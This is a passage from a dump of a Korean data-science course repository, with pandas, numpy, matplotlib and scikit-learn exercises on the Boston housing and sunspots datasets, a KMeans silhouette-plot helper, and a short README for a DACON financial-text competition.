df.kurt(),\"\\n\")\r\n\r\nprint('-'*50)\r\n\r\n\r\n# 2-1번\r\nprint('CRIM mean: ', df['CRIM'].mean())\r\nprint(df[df['CRIM'] > df['CRIM'].mean()])\r\n\r\nprint('-'*50)\r\n\r\n# 2-2번\r\nprint('AGE mean: ', df['AGE'].mean())\r\nprint(df[df['AGE'] < df['AGE'].mean()])\r\n\r\nprint('-'*50)\r\n\r\n# 2-3번\r\nprint('MEDV median: ', df['MEDV'].median())\r\nprint(df[df['MEDV'] < df['MEDV' ].median()])\r\n\r\nprint('-'*50)\r\n\r\n# 3번\r\n\r\ndf_train = pd.read_csv('boston_train.csv')\r\ndf_test = pd.read_csv('boston_test.csv')\r\n\r\n# df = pd.concat([df_train[:10],df_test[:10]],ignore_index=True)\r\ndf = df_train[:10].append(df_test[:10],ignore_index=True)\r\n\r\nprint(df)\r\n\r\ndf.to_csv('boston_batch.csv', index=False)\r\nprint('-'*50)\r\n\r\n# 4번\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\n# print(pd.pivot_table(df,columns=['CRIM'], agg_func = np.sum))\r\n\r\nfor col in df.columns:\r\n# for col in df.columns[:]:\r\n print('[',col,']')\r\n print('sum :',df[col].sum())\r\n print('mean :',df[col].mean())\r\n print('median :',df[col].median())\r\n print('min :',df[col].min())\r\n print('max :',df[col].max())\r\n print('describe :', df[col].describe())\r\n\r\n# 5번\r\n\r\nsunspots = pd.read_csv(\"sunspots.csv\")\r\nprint(\"Total Null Values\\n\", pd.isnull(sunspots).sum())\r\nsunspots = sunspots.fillna(0)\r\nprint(sunspots)\r\nprint(\"Total Null Values\\n\", pd.isnull(sunspots).sum())\r\n\r\nsunspots.to_csv('sunspots_new.csv',float_format = '%.2f',\r\n na_rep='NaN',index=False)\r\n\r\n# 6번\r\nsunspots = pd.read_csv(\"sunspots.csv\")\r\nsunspots['Date'] = pd.to_datetime(sunspots['Date'])\r\nprint(sunspots.dtypes)\r\nprint('Mean:',pd.Series(sunspots['Date']).mean())\r\n\r\nsunspots = sunspots[sunspots['Date'] > sunspots['Date'].mean()]\r\n\r\nsunspots.to_csv('sunspots_new2.csv',float_format = '%.2f',\r\n na_rep='NaN',index=False)\r\nsunspots = pd.read_csv(\"sunspots_new2.csv\")\r\nprint(sunspots.dtypes)\r\n\r\nprint('-'*50)\r\n\r\n# 7번\r\ndf_A_B = pd.DataFrame({'판매월': ['1월', '2월', '3월', '4월'],\r\n '제품A': [100, 150, 200, 130],\r\n '제품B': [90, 110, 140, 170]})\r\nprint(df_A_B)\r\n\r\ndf_C_D = pd.DataFrame({'판매월': ['1월', '2월', '3월', '4월'],\r\n '제품C': [112, 141, 203, 134],\r\n '제품D': [90, 110, 140, 170]})\r\nprint(df_C_D)\r\n\r\nprint(df_A_B.merge(df_C_D,on='판매월'))\r\n\r\nprint('-'*50)\r\n\r\n# 8번\r\ndf_left = pd.DataFrame({'key':['A','B','C'],\r\n 'left': [1, 2, 3]})\r\nprint(df_left)\r\n\r\ndf_right = pd.DataFrame({'key':['A','B','D'],\r\n 'right': [4, 5, 6]})\r\nprint(df_right)\r\n\r\n# 8.1\r\nprint('\\ninner join:')\r\nprint(df_left.merge(df_right, how='inner', on = 'key'))\r\n\r\n# 8.2\r\nprint('\\nouter join:')\r\nprint(df_left.merge(df_right, how='outer', on = 'key'))\r\n\r\n# 8.3\r\nprint('\\nleft join:')\r\nprint(df_left.merge(df_right, how='left', on = 'key'))\r\n\r\n# 8.4\r\nprint('\\nright join:')\r\nprint(df_left.merge(df_right, how='right', on = 'key'))\r\n\r\n\r\nprint('-'*50)\r\n\r\n\r\n# 9번\r\ndf = pd.read_csv('WHO_first9cols.csv')\r\nresult = df['Country'].str.contains(\"Albania\")\r\nprint(df['Country'][result]) # 요소값들로 출력\r\nprint(df[result]) # 데이터 프레임으로 출력\r\n\r\nresult = df['Country'].str.contains(\"Ethiopia\")\r\nprint(df['Country'][result]) # 요소값들로 출력\r\nprint(df[result]) # 데이터 프레임으로 출력\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5629723072052002,
"alphanum_fraction": 0.5789252519607544,
"avg_line_length": 43.846153259277344,
"blob_id": "c9569485edea93864bd84c3089ae9746c3bc55a8",
"content_id": "556f387c6775730cc2d246c4e84b16f61775f438",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2752,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/파이썬머신러닝/visualize_silhouette함수.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "### 여러개의 클러스터링 갯수를 List로 입력 받아 각각의 실루엣 계수를 면적으로 시각화한 함수 작성\r\ndef visualize_silhouette(cluster_lists, X_features): \r\n \r\n from sklearn.datasets import make_blobs\r\n from sklearn.cluster import KMeans\r\n from sklearn.metrics import silhouette_samples, silhouette_score\r\n\r\n import matplotlib.pyplot as plt\r\n import matplotlib.cm as cm\r\n import math\r\n \r\n # 입력값으로 클러스터링 갯수들을 리스트로 받아서, 각 갯수별로 클러스터링을 적용하고 실루엣 개수를 구함\r\n n_cols = len(cluster_lists)\r\n \r\n # plt.subplots()으로 리스트에 기재된 클러스터링 수만큼의 sub figures를 가지는 axs 생성 \r\n fig, axs = plt.subplots(figsize=(4*n_cols, 4), nrows=1, ncols=n_cols)\r\n \r\n # 리스트에 기재된 클러스터링 갯수들을 차례로 iteration 수행하면서 실루엣 개수 시각화\r\n for ind, n_cluster in enumerate(cluster_lists):\r\n \r\n # KMeans 클러스터링 수행하고, 실루엣 스코어와 개별 데이터의 실루엣 값 계산. \r\n clusterer = KMeans(n_clusters = n_cluster, max_iter=500, random_state=0)\r\n cluster_labels = clusterer.fit_predict(X_features)\r\n \r\n sil_avg = silhouette_score(X_features, cluster_labels)\r\n sil_values = silhouette_samples(X_features, cluster_labels)\r\n \r\n y_lower = 10\r\n axs[ind].set_title('Number of Cluster : '+ str(n_cluster)+'\\n' \\\r\n 'Silhouette Score :' + str(round(sil_avg,3)) )\r\n axs[ind].set_xlabel(\"The silhouette coefficient values\")\r\n axs[ind].set_ylabel(\"Cluster label\")\r\n axs[ind].set_xlim([-0.1, 1])\r\n axs[ind].set_ylim([0, len(X_features) + (n_cluster + 1) * 10])\r\n axs[ind].set_yticks([]) # Clear the yaxis labels / ticks\r\n axs[ind].set_xticks([0, 0.2, 0.4, 0.6, 0.8, 1])\r\n \r\n # 클러스터링 갯수별로 fill_betweenx( )형태의 막대 그래프 표현. \r\n for i in range(n_cluster):\r\n ith_cluster_sil_values = sil_values[cluster_labels==i]\r\n ith_cluster_sil_values.sort()\r\n \r\n size_cluster_i = ith_cluster_sil_values.shape[0]\r\n y_upper = y_lower + size_cluster_i\r\n \r\n color = cm.nipy_spectral(float(i) / n_cluster)\r\n axs[ind].fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_sil_values, \\\r\n facecolor=color, edgecolor=color, alpha=0.7)\r\n axs[ind].text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))\r\n y_lower = y_upper + 10\r\n \r\n axs[ind].axvline(x=sil_avg, color=\"red\", linestyle=\"--\")"
},
{
"alpha_fraction": 0.6441473960876465,
"alphanum_fraction": 0.6697976589202881,
"avg_line_length": 17.22222137451172,
"blob_id": "b824f3bb3df2573803733bea3e9c1c2dc37ecc88",
"content_id": "7d95d07b282d915a14a96d8a2a3a398c884ea52a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2934,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 144,
"path": "/파이썬데이터분석/boston_전처리.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# boston_전처리.py\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n# df = df.fillna(0)\r\n\r\n# 'CRIM' 원본\r\ncrime = df['CRIM'].values\r\nplt.subplot(221)\r\nplt.hist(crime)\r\nplt.title('CRIME 원본')\r\n# plt.show()\r\n\r\n# 'CRIM' 표준화\r\ncrime = crime.reshape(-1,1)\r\ncrime_std = StandardScaler().fit_transform(crime)\r\ncrime_std_zoomin = crime_std[crime_std < 2]\r\n\r\nplt.subplot(222)\r\nplt.hist(crime_std_zoomin)\r\nplt.title('CRIME 표준화')\r\n\r\n\r\n# 'CRIM' 정규화\r\ncrime_std_zoomin = crime_std_zoomin.reshape(-1,1)\r\ncrime_minmax = MinMaxScaler().fit_transform(crime_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(crime_minmax)\r\nplt.title('CRIME 정규화')\r\n\r\nplt.show()\r\n\r\n\r\n# 'ZN' 원본\r\nzn = df['ZN'].values\r\nplt.subplot(221)\r\nplt.hist(zn)\r\nplt.title('zn 원본')\r\n\r\n# 'ZN' 표준화\r\nzn = zn.reshape(-1,1)\r\nzn_std = StandardScaler().fit_transform(zn)\r\n# plt.boxplot(zn_std)\r\n# plt.show()\r\n# input()\r\nzn_std_zoomin = zn_std[zn_std < 1]\r\n\r\nplt.subplot(222)\r\nplt.hist(zn_std_zoomin)\r\nplt.title('ZN 표준화')\r\n\r\n\r\n# 'ZN' 정규화\r\nzn_std_zoomin = zn_std_zoomin.reshape(-1,1)\r\nzn_minmax = MinMaxScaler().fit_transform(zn_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(zn_minmax)\r\nplt.title('ZN 정규화')\r\n\r\nplt.show()\r\n\r\n# 'TAX' 원본\r\ntax = df['TAX'].values\r\nplt.subplot(221)\r\nplt.hist(tax)\r\nplt.title('TAX 원본')\r\n\r\n# 'TAX' 표준화\r\ntax = tax.reshape(-1,1)\r\ntax_std = StandardScaler().fit_transform(tax)\r\ntax_std_zoomin = tax_std[tax_std < 0.5]\r\n\r\nplt.subplot(222)\r\nplt.hist(tax_std_zoomin)\r\nplt.title('TAX 표준화')\r\n\r\n\r\n# 'TAX' 정규화\r\ntax_std_zoomin = tax_std_zoomin.reshape(-1,1)\r\ntax_minmax = MinMaxScaler().fit_transform(tax_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(tax_minmax)\r\nplt.title('TAX 정규화')\r\nplt.show()\r\n\r\n# 'MEDV' 원본\r\nmedv = df['MEDV'].values\r\nplt.subplot(221)\r\nplt.hist(medv)\r\nplt.title('MEDV 원본')\r\n\r\n# 'MEDV' 표준화\r\nmedv = medv.reshape(-1,1)\r\nmedv_std = StandardScaler().fit_transform(medv)\r\nmedv_std_zoomin = medv_std[medv_std < 1.8]\r\n\r\nplt.subplot(222)\r\nplt.hist(medv_std_zoomin)\r\nplt.title('MEDV 표준화')\r\n\r\n\r\n# 'MEDV' 정규화\r\nmedv_std_zoomin = medv_std_zoomin.reshape(-1,1)\r\nmedv_minmax = MinMaxScaler().fit_transform(medv_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(medv_minmax)\r\nplt.title('MEDV 정규화')\r\nplt.show()\r\n\r\n\r\n# 최종 결과\r\nplt.subplot(221)\r\nplt.hist(crime_minmax)\r\nplt.title('CRIM 정규화')\r\n\r\nplt.subplot(222)\r\nplt.hist(zn_minmax)\r\nplt.title('ZN 정규화')\r\n\r\nplt.subplot(223)\r\nplt.hist(tax_minmax)\r\nplt.title('TAX 정규화')\r\n\r\nplt.subplot(224)\r\nplt.hist(medv_minmax)\r\nplt.title('MEDV 정규화')\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.5975689888000488,
"alphanum_fraction": 0.6238502264022827,
"avg_line_length": 21.968503952026367,
"blob_id": "36aba5dd86afd890571bb5ca5c8285a55e783053",
"content_id": "724f87123eb95ce06bb9634777c2ea667ff7bccf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3114,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 127,
"path": "/파이썬데이터분석/matplotlib_실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# matplotlib_실습문제.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\n# 1.1번 로그플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nprint(type(poly))\r\nprint('Poly',poly[0]) # W, 기울기\r\nprint('Poly',poly[1]) # b, y절편\r\n# plt.plot(crim,np.log(medv),'o')\r\n# plt.show()\r\nplt.semilogy(crim,medv,'o')\r\nplt.semilogy(crim,np.exp(np.polyval(poly,crim)))\r\nplt.title('1.1 Boston crim/zn medv scatter plot')\r\n\r\nplt.show()\r\nprint(df.corr())\r\n\r\n\r\n# 1.2번 분산 플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\nzn = df['ZN'].values\r\n\r\n# c: color, s:size, apha:투명도\r\nplt.scatter(crim,medv,c = 200*crim,\r\n s =20 + 200*zn/zn.max(),\r\n alpha = 0.5) # 버블차트\r\n\r\nplt.grid(True)\r\nplt.xlabel('crim')\r\nplt.ylabel('medv')\r\nplt.title('1.2 Boston crim/zn medv scatter plot')\r\nplt.show()\r\n\r\n# 1.3 번\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nplt.plot(crim, np.polyval(poly, crim), label='Fit')\r\n\r\nmedv_start = int(medv.mean())\r\nprint(medv_start )\r\ny_ann = np.log(df.at[medv_start, 'MEDV']) - 0.1\r\nprint(y_ann)\r\nann_str = \"Medv Crime\\n %d\" % medv_start\r\nplt.annotate(ann_str, xy=(medv_start, y_ann),\r\n arrowprops=dict(arrowstyle=\"->\"),\r\n xytext=(-30, +70), textcoords='offset points')\r\n\r\ncnt_log = np.log(medv)\r\nplt.scatter(crim, cnt_log, c= 200 * crim,\r\n s=20 + 200 * zn/zn.max(),\r\n alpha=0.5, label=\"Scatter Plot\")\r\nplt.legend(loc='upper right')\r\nplt.grid()\r\nplt.xlabel(\"Crime\")\r\nplt.ylabel(\"Medv\", fontsize=16)\r\nplt.title(\"1.3 Boston Housing : Crime Medv\")\r\nplt.show()\r\n\r\n# 1.4번\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\n\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nX = df['CRIM'].values\r\n\r\nY = np.where(df['MEDV'].values>0, np.log(df['MEDV'].values), 0)\r\nX, Y = np.meshgrid(X, Y)\r\n\r\nZ = np.where(df['ZN'].values>0, np.log(df['ZN'].values), 0)\r\n# Z =Z.reshape(1,Z.shape[0])\r\nZ,_ =np.meshgrid(Z,0)\r\n\r\nax.plot_surface(X, Y, Z)\r\nax.set_xlabel('CRIME')\r\nax.set_ylabel('MEDV')\r\nax.set_zlabel('ZN')\r\nax.set_title(\"1.4 Boston Housing : Crime/ZN Medv\")\r\nplt.show()\r\n\r\n# 1.5번\r\nfrom pandas.plotting import lag_plot\r\n\r\nlag_plot(np.log(df['MEDV']))\r\nplt.title('1.5 Boston lag_plot')\r\nplt.show()\r\n\r\n# 1.6번\r\nfrom pandas.plotting import autocorrelation_plot\r\nautocorrelation_plot(np.log(df['MEDV']))\r\n\r\nplt.title('1.6 Boston autocorrelation_plot')\r\nplt.show()\r\n\r\n# 1.7번\r\n\r\ndf.plot.box()\r\nplt.title('1.7.1 Boston Box plot')\r\nplt.show()\r\n\r\ndf['TAX'].plot.box()\r\nplt.boxplot(df['TAX'],labels=['TAX'])\r\nplt.text(1, df['TAX'].median(), df['TAX'].median())\r\n\r\nplt.title('1.7.2 Boston TAX Box plot')\r\nplt.show()\r\n\r\nplt.boxplot(df['TAX'],labels=['TAX'])\r\nplt.text(1, df['TAX'].median(), df['TAX'].median())\r\nplt.title('1.7.3 Boston TAX Box plot')\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.2929813265800476,
"alphanum_fraction": 0.5183515548706055,
"avg_line_length": 20.478260040283203,
"blob_id": "2705d51721ae507bf873afe7ebc5eacbb7db967a",
"content_id": "97d4c9a53416013d4569fb3a3e15b71b6c5e4a70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 69,
"path": "/파이썬데이터분석/numpy활용실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# numpy활용실습문제.py\r\n\r\nimport numpy as np\r\n\r\n# 1번\r\n# 3*X0 + 2*X1 - 4*X2 = 52\r\n# 2*X0 - 4*X1 + 9*X2 = -27\r\n# 5*X0 + 3*X1 - 7*X2 = 86\r\n# X0 = 10\r\n# X1 = 5\r\n# X2 = -3\r\nA = np.mat(\"3 2 -4;2 -4 9;5 3 -7\")\r\nprint(\"A\\n\", A)\r\nb = np.array([52, -27, 86])\r\nprint(\"b\\n\", b)\r\n\r\nx = np.linalg.solve(A, b)\r\nprint(\"Solution : \", x) # [10. 5. -3.]\r\nprint('Check:',np.dot(A,x))\r\n\r\n# 역행렬로 답 구하기\r\ninverse = np.linalg.inv(A)\r\nx = np.dot(inverse,b)\r\nprint('using inverse:',x)\r\n\r\n\r\n\r\n\r\n\r\n\r\n# 2번\r\n\r\ndef mydot(a,b):\r\n r = np.arange(a.shape[0]*b.shape[1]).reshape(a.shape[0],\r\n b.shape[1])\r\n for i in range(a.shape[0]):\r\n for j in range(b.shape[1]):\r\n c = a[i, :] * b[:, j]\r\n r[i][j]= c.sum()\r\n return r\r\n\r\n\r\n# (m,n) * (n,l) = (m,l)\r\na = np.arange(6).reshape(2,3)\r\nb = np.arange(6).reshape(3,2)\r\nprint('\\na.dot(b):')\r\nprint(a.dot(b))\r\nprint('\\nmydot(a,b):')\r\nprint(mydot(a,b))\r\n# [[10 13]\r\n# [28 40]]\r\n\r\na = np.arange(24).reshape(4,6)\r\nb = np.arange(54).reshape(6,9)\r\nprint('\\na.dot(b):')\r\nprint(a.dot(b))\r\nprint('\\nmydot(a,b):')\r\nprint(mydot(a,b))\r\n# a.dot(b):\r\n# [[ 495 510 525 540 555 570 585 600 615]\r\n# [1305 1356 1407 1458 1509 1560 1611 1662 1713]\r\n# [2115 2202 2289 2376 2463 2550 2637 2724 2811]\r\n# [2925 3048 3171 3294 3417 3540 3663 3786 3909]]\r\n#\r\n# mydot(a,b):\r\n# [[ 495 510 525 540 555 570 585 600 615]\r\n# [1305 1356 1407 1458 1509 1560 1611 1662 1713]\r\n# [2115 2202 2289 2376 2463 2550 2637 2724 2811]\r\n# [2925 3048 3171 3294 3417 3540 3663 3786 3909]]\r\n\r\n"
},
{
"alpha_fraction": 0.5920398235321045,
"alphanum_fraction": 0.6965174078941345,
"avg_line_length": 9.526315689086914,
"blob_id": "6033b27a58187a833eb490890b04cc58f5ba8ddb",
"content_id": "8eb027b6ab5aeda8e6c2e0862183b1d8a928de09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 19,
"path": "/DACON_14회/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "\nMission 14. 금융문자 분석 경진대회\n\n기간 : 2019.11.21 ~ 2020.1.12\n\n\nhttps://dacon.io/cpt14\n\n\n\n\nkonlpy 설치: pip install konlpy\n\n\nMecab 설치\n\nhttps://cleancode-ws.tistory.com/97\n\n\nhttp://konlpy.org/en/latest/install/\n"
}
] | 21 |
ybenigot/all-convolutional-cnn-keras | https://github.com/ybenigot/all-convolutional-cnn-keras | 82be71e7b0abb4db3bf6921e07d375f5bcbbf862 | 650cdc7a24a8d47aef7f3e7342a3e5ecf3dccbbf | 440437ba43bce55412c7e2ff4fdb74fb8e49f0fd | refs/heads/master | 2021-01-18T14:53:46.182049 | 2016-09-19T18:58:43 | 2016-09-19T18:58:43 | 68,439,539 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6694989204406738,
"alphanum_fraction": 0.687117338180542,
"avg_line_length": 32.19916915893555,
"blob_id": "5f031dc71666283005a5d78a7cde8281981880b6",
"content_id": "7337c89734a0d1038fa24740410408aa8eceb795",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8003,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 241,
"path": "/convnet3.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "# adapted from keras examples\nfrom keras.optimizers import SGD, Nadam\nfrom keras.datasets import cifar10\nfrom keras.utils.np_utils import to_categorical\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.regularizers import l2, activity_l2\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\n\nfrom trace import TraceWeights\n\nimport numpy as np\nimport sys\nimport imageutils as im\nimport time\nimport cifar10labels as cl\nimport random as rn\nimport datetime as dt\nimport os\nimport plot as pl\nimport modelallcnn as mo\n\nfrom sklearn.utils import shuffle # used for shuffling batch of samples\n\n############### Parameters ################\nimage_size=32\nimage_border=16\ninput_size=image_size+2*image_border\nbatch_size_param=32\nlearn_rate=0.0003\n#decay_param=4e-5 # 1 - 0.1**(1/(100*45000/256))) \ntraining_set_ratio=0.9\ntranslation_augmentation=0.2\nflip_augmentation=True\n\nclass PreProcessor:\n\n\t@staticmethod\n\tdef load_datasets():\n\t\t''' load and normalize data from dataset files '''\n\t\t(X, y), (X_test, y_test) = cifar10.load_data()\n\t\tn = X.shape[0]\n\t\tn1 = int(n * training_set_ratio)\n\t\tn2 = n-n1\n\t\t#randomize dataset split\n\t\tindex_val = rn.sample(range(n), n2)\n\t\tX_val = X[index_val,:]\n\t\ty_val = y[index_val]\n\t\tindex_train=[i for i in range(n) if i not in index_val]\t\t\n\t\tX_train=X[index_train,:]\n\t\ty_train=y[index_train]\n\t\treturn X_train, y_train, X_val, y_val, X_test, y_test\n\n\t@staticmethod\n\tdef compute_average(data):\n\t\t''' compute mean per color channel for all data '''\n\t\tm = np.zeros(data.shape[1])\n\t\tfor j in range(0,data.shape[1]):\n\t\t\tm[j] = np.mean(data[:,j,:])\n\t\treturn m\n\n\t@staticmethod\n\tdef scale_data(data,avg_per_channel):\n\t\t''' scale the image pixel values into interval 0,2, mean will be substrated later '''\n\t\tscale=128\n\t\tn=data.shape[0]\n\t\tdata = data.astype('float32')\n\t\tdata = data.reshape((n,3,image_size,image_size))\n\t\tif input_size>image_size:\n\t\t\t# extend image size with zeroes\n\t\t\tdata2 = np.zeros((n,3,input_size,input_size),dtype=np.float32)\n\t\t\tfor i in range(0,n):\n\t\t\t\tfor j in range(0,3):\n\t\t\t\t\t#substract mean, per sample and per color channel \n\t\t\t\t\tdata2[i,j,image_border:image_size+image_border,image_border:image_size+image_border] =\\\n\t\t\t\t\t\tdata[i,j,:,:] - avg_per_channel[j]\n\t\t\tdata2 /= scale\n\t\t\treturn data2\t\n\t\telse:\n\t\t\tdata /= scale\n\t\t\treturn data\n\n\t@staticmethod\n\tdef augment(X):\n\t\t''' compute pseudo-random translation, flip etc of X data to augment the dataset inputs '''\n\t\t''' pseudo-random augmentation means that multiple augmenation on the same data will yield the same result '''\n\t\tn=X.shape[0]\n\t\trn.seed(a=1, version=2)\n\t\tmax_translation=int(image_size*translation_augmentation)\n\t\tX2=np.zeros(X.shape)\n\t\tx_max=X.shape[2]\n\t\ty_max=X.shape[3]\n\t\tx_range=range(0,x_max)\n\t\ty_range=range(0,y_max)\n\t\t# loop on sample, channel, x coord, y coord\n\t\tfor i in range(0,n):\n\t\t\tflip=bool(rn.randrange(0,1,1))\n\t\t\tx_translation=rn.randrange(0, max_translation,1)\n\t\t\ty_translation=rn.randrange(0, max_translation,1)\n\t\t\tfor k in x_range:\n\t\t\t\tfor l in y_range:\n\t\t\t\t\tif k+x_translation in x_range and l+y_translation in y_range:\n\t\t\t\t\t\tif flip:\n\t\t\t\t\t\t\tfor j in range(0,3): # same augmentation translation/flip for all channels\n\t\t\t\t\t\t\t\tX2[i,j,x_max-k,y_max-l]=image=X[i,j,k+x_translation,l+y_translation]\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tfor j in range(0,3):\n\t\t\t\t\t\t\t\tX2[i,j,k,l]=image=X[i,j,k+x_translation,l+y_translation]\n\t\treturn X2\n\n\tdef process_data_batch(self,X,y,avg_per_channel):\n\t\t''' preprocess a batch of data in memory, same algorithm for train, validation, and test data '''\n\t\t''' note : the same batch of data is \"re augmented\" again for each pass '''\n\n\t\tX=self.scale_data(X,avg_per_channel)\n\t\tX=self.augment(X)\n\t\ty = to_categorical(y,10)\n\t\treturn X,y\n\nclass Engine:\n\n\tX_batch_current=0\n\ty_batch_current=0\n\n\tdef __init__(self,preprocessor):\n\t\tself.preprocessor = preprocessor\n\n\tdef dataGenerator(self,X,y,batch_size,avg_per_channel):\n\t\t''' a python 3 generator for producing batches of data '''\n\t\tprint(\"new generator for %s \\n\" % (X.shape,) )\n\t\twhile(True):\n\t\t\tN=int(X.shape[0]/batch_size)\n\t\t\tfor i in range(N):\n\t\t\t\tX_batch = X[i*batch_size:(i+1)*batch_size,:,:,:]\n\t\t\t\ty_batch = y[i*batch_size:(i+1)*batch_size]\n\t\t\t\tself.X_batch_current,self.y_batch_current = self.preprocessor.process_data_batch(X_batch, y_batch, avg_per_channel)\n\t\t\t\t#print(i,'X_.shape ',X2.shape,'y.shape ',y2.shape,' y ',y2)\n\t\t\t\tyield self.X_batch_current,self.y_batch_current\n\t\t\t# random shuffle the data set after each batch to immprove learning\n\t\t\tprint(\"shuffle X,y\")\n\t\t\tX,y=shuffle(X,y)\n\n\tdef fit(self,model , X_train, y_train, X_val, y_val, epochs,avg_per_channel):\n\t\t''' train the model '''\n\t\tearlyStopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto')\n\t\tcheckpointer = ModelCheckpoint(filepath=\"record/weights.{epoch:02d}-{val_loss:.2f}.hdf\", verbose=1, save_best_only=True)\n\t\ttraceWeightsTrain=TraceWeights(1,self)\n\t\tg_train=self.dataGenerator(X_train, y_train, batch_size=batch_size_param,avg_per_channel=avg_per_channel)\n\t\tg_valid=self.dataGenerator(X_val, y_val, batch_size=batch_size_param,avg_per_channel=avg_per_channel)\n\t\thistory=model.fit_generator(g_train,callbacks=[checkpointer,\\\n\t\t\t#earlyStopping,\\\n\t\t\t#traceWeightsTrain\\\n\t\t\t],\\\n\t\t\tsamples_per_epoch=len(X_train),nb_epoch=epochs,verbose=1,validation_data=g_valid,nb_val_samples=y_val.shape[0])\n\t\treturn history\n\n\t@staticmethod\n\tdef predict(model,X,y):\n\t\t''' predict Y given X using model '''\n\t\tpred = model.predict(X, batch_size=batch_size_param, verbose=0)\n\t\t#g.fit(X)\n\t\t#pred = model.predict_generator(g.flow(X, y, batch_size=512), X.shape[0])\n\t\treturn pred\n\n\t@staticmethod\n\tdef compute_accuracy(pred,Y):\n\t\t'''compute prediction accuracy by matching pred and Y'''\n\t\tcomparison = np.argmax(pred,1)==np.argmax(Y,1)\n\t\taccuracy = sum(comparison)/pred.shape[0]\n\t\treturn accuracy\n\n\ndef show_results(pred,X,Y):\n\tclassification=np.argmax(pred,1)\t\n\tfor i in rn.sample(range(X.shape[0]), 1):\n\t\tim.display_normalized_image(X[i,:],input_size)\n\t\tprint('prediction:',cl.labels[classification[i]],'actual value:',cl.labels[np.argmax(Y[i])])\n\t\ttime.sleep(5)\n\ndef main():\n\n\tepochs=int(sys.argv[1])\n\tprint(epochs,' epochs')\n\n\ttry:\n\t\treload_model=sys.argv[3]\n\texcept:\n\t\treload_model=\"NO\"\n\n\n\tpreprocessor = PreProcessor()\n\tengine = Engine(preprocessor)\n\n\tX_train, y_train, X_val, y_val, X_test, y_test = preprocessor.load_datasets()\n\n\tavg_per_channel=preprocessor.compute_average(X_train)\n\n\tX_batch = X_train[0:batch_size_param,:,:,:]\n\ty_batch = y_train[0:batch_size_param]\n\t#X1,y1 = preprocessor.process_data_batch(X_batch,y_batch,avg_per_channel)\n\t# for i in range(0,3):\n\t# \tim.display_normalized_image(X1[i,:],input_size,avg_per_channel)\n\t# \tim.display_image(X_batch[i,:],image_size)\n\n\tprint('X_train.shape ',X_train.shape,'y_train.shape ',y_train.shape)\n\tprint('X_val.shape ', X_val.shape, 'y_val.shape ', y_val.shape)\n\tprint('X_test.shape ', X_test.shape, 'y_test.shape ', y_test.shape)\n\n\t# prepare the model\n\tmodel = mo.make_model(input_size)\n\t#opt = SGD(lr=learn_rate, decay=decay_param, momentum=0.9, nesterov=True)\n\topt = Nadam(lr=learn_rate)#,clipvalue=100)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=opt,metrics=[\"accuracy\"])\n\n\tif reload_model != \"NO\":\n\t\tprint('load model weights:',reload_model)\n\t\tmodel.load_weights(reload_model)\n\n\tprint('model parameters:',model.count_params())\n\tprint('model characteristics:',model.summary())\n\tprint('----------------------------------------------------------------------------------------')\n\n\thist=engine.fit(model , X_train, 